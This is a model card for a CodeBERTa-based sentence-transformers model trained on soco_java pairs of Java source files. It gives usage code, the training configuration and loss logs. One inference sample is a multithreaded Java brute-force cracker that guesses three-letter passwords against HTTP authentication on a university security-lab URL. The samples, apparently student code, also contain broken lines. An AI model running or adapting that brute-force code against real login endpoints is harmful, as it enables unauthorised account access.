Paper: Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks (arXiv:1908.10084)
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Full model architecture:

```
SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
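The Pooling module above mean-pools the token embeddings produced by the RobertaModel backbone into a single 768-dimensional vector. As a rough illustration of that step, the sketch below reproduces an embedding with plain transformers and manual mean pooling; it assumes the Hub repository exposes the underlying Roberta weights (as sentence-transformers repositories normally do), and the example string is illustrative.

```python
# Minimal sketch: reproduce the 768-dim embedding at the transformers level
# by mean-pooling token embeddings over the attention mask (matches the
# Pooling configuration shown above). The input snippet is illustrative.
import torch
from transformers import AutoTokenizer, AutoModel

model_id = "buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModel.from_pretrained(model_id)

code = ["public static void main(String[] args) { }"]
batch = tokenizer(code, padding=True, truncation=True, max_length=512, return_tensors="pt")

with torch.no_grad():
    token_embeddings = model(**batch).last_hidden_state  # [batch, seq_len, 768]

# Mean pooling: average the token embeddings, ignoring padding positions.
mask = batch["attention_mask"].unsqueeze(-1).float()
sentence_embedding = (token_embeddings * mask).sum(dim=1) / mask.sum(dim=1).clamp(min=1e-9)
print(sentence_embedding.shape)  # torch.Size([1, 768])
```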
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")

# Run inference
sentences = [
'\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n String userPassword = ":"+pwd;\n RealThread myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n th.start();\n try\n {\n \n \n th.sleep(100);\n }\n catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty ("Authorization", " " + encoding);\n System.out.println("Reponse = "+uc.getResponseCode()+"for pwd = "+userPassword);\n this.responseCode = uc.getResponseCode();\n \n if(uc.getResponseCode()==200)\n {\n System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println("Could not execute Thread "+num+" ");\n }\n }\n\n}\n',
'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
'\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr = t.exec("md5sum csfirst.html");\n\n InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n BufferedReader bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\t\t index = s.indexOf(\' \');\n\t\t Fmd5 = s.substring(0,index);\n\t\t System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("md5sum index.html");\n\t\t \n\n\t\t InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\t\t index = temp1.indexOf(\' \');\n\t\t Smd5 = temp1.substring(0,index);\n\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5 == Smd5)\n\t\t System.out.println(" changes Detected");\n\t\t else\n\t\t {\n\t\t pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(" Message.txt | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
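By default, `model.similarity` computes cosine similarity between the embeddings. Beyond pairwise scores, the embeddings can also drive a simple semantic code search; the sketch below uses `sentence_transformers.util.semantic_search`, and the corpus and query snippets are made-up examples rather than samples from the training data.

```python
# Minimal semantic-search sketch over a small corpus of Java snippets.
# The corpus/query strings are illustrative, not from the soco_java dataset.
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")

corpus = [
    "public int add(int a, int b) { return a + b; }",
    "System.out.println(\"Hello, world\");",
    "BufferedReader in = new BufferedReader(new FileReader(path));",
]
query = "int sum(int x, int y) { return x + y; }"

corpus_embeddings = model.encode(corpus, convert_to_tensor=True)
query_embedding = model.encode(query, convert_to_tensor=True)

# Returns the top_k most similar corpus entries for the query.
hits = util.semantic_search(query_embedding, corpus_embeddings, top_k=2)[0]
for hit in hits:
    print(corpus[hit["corpus_id"]], hit["score"])
```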
Training dataset: soco_java

- Columns: label, text_1, and text_2
- Column types:

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |

- Samples: pairs of Java source files (text_1, text_2) with an integer label
- Loss: SoftmaxLoss

Evaluation dataset:

- Columns: label, text_1, and text_2
- Column types:

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |

- Samples: pairs of Java source files (text_1, text_2) with an integer label
- Loss: SoftmaxLoss

Training hyperparameters (non-default):

- eval_strategy: steps
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- learning_rate: 2e-05
- num_train_epochs: 1
- warmup_ratio: 0.1
- fp16: True

All hyperparameters:

- overwrite_output_dir: False
- do_predict: False
- eval_strategy: steps
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 2e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.1
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: True
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional

Training logs:

| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.2015 | 0.0240 |
| 0.1064 | 200 | 0.0143 | 0.0209 |
| 0.1596 | 300 | 0.0241 | 0.0241 |
| 0.2128 | 400 | 0.0174 | 0.0213 |
| 0.2660 | 500 | 0.0228 | 0.0206 |
| 0.3191 | 600 | 0.0061 | 0.0226 |
| 0.3723 | 700 | 0.0194 | 0.0208 |
| 0.4255 | 800 | 0.0193 | 0.0197 |
| 0.4787 | 900 | 0.0261 | 0.0175 |
| 0.5319 | 1000 | 0.0189 | 0.0178 |
| 0.5851 | 1100 | 0.0089 | 0.0188 |
| 0.6383 | 1200 | 0.0174 | 0.0161 |
| 0.6915 | 1300 | 0.0171 | 0.0162 |
| 0.7447 | 1400 | 0.0149 | 0.0155 |
| 0.7979 | 1500 | 0.0110 | 0.0164 |
| 0.8511 | 1600 | 0.0308 | 0.0160 |
| 0.9043 | 1700 | 0.0048 | 0.0167 |
| 0.9574 | 1800 | 0.0142 | 0.0164 |
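For context on how the pieces above fit together, the following is a minimal sketch of a comparable fine-tuning run: SoftmaxLoss over (text_1, text_2, label) pairs with the non-default hyperparameters listed earlier. The dataset identifier, split names, and num_labels are assumptions for illustration; the card only states that the soco_java dataset was used.

```python
# Minimal training sketch: SoftmaxLoss over (text_1, text_2, label) pairs using the
# non-default hyperparameters listed above. Dataset id, split names, and num_labels
# are assumptions for illustration, not taken from this card.
from datasets import load_dataset
from sentence_transformers import (
    SentenceTransformer,
    SentenceTransformerTrainer,
    SentenceTransformerTrainingArguments,
)
from sentence_transformers.losses import SoftmaxLoss

model = SentenceTransformer("huggingface/CodeBERTa-small-v1")

# Hypothetical dataset id and splits; the card only names "the soco_java dataset".
dataset = load_dataset("soco_java")  # expected columns: label, text_1, text_2
train_dataset = dataset["train"]
eval_dataset = dataset["validation"]

loss = SoftmaxLoss(
    model=model,
    sentence_embedding_dimension=model.get_sentence_embedding_dimension(),  # 768
    num_labels=2,  # assumption; the card does not list the label set
)

args = SentenceTransformerTrainingArguments(
    output_dir="codeberta-soco-java-softmax",
    eval_strategy="steps",
    per_device_train_batch_size=16,
    per_device_eval_batch_size=16,
    learning_rate=2e-5,
    num_train_epochs=1,
    warmup_ratio=0.1,
    fp16=True,
)

trainer = SentenceTransformerTrainer(
    model=model,
    args=args,
    train_dataset=train_dataset,
    eval_dataset=eval_dataset,
    loss=loss,
)
trainer.train()
```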
Citation (BibTeX):

```bibtex
@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}
```
Base model: huggingface/CodeBERTa-small-v1